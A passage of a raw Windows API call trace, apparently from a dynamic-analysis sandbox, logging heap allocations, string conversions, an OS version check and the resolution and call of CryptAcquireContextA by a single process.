| out: hHeap=0x25c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.783] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0198.783] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0198.784] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0e0 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e10 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.784] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.785] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0198.785] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.785] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ea0 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.786] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.786] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0198.786] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0198.786] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0198.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0198.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0198.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.791] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.791] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.791] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0198.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0198.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0198.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0198.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0198.792] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0198.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0198.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.794] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0198.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.796] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0198.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0198.796] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0198.796] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 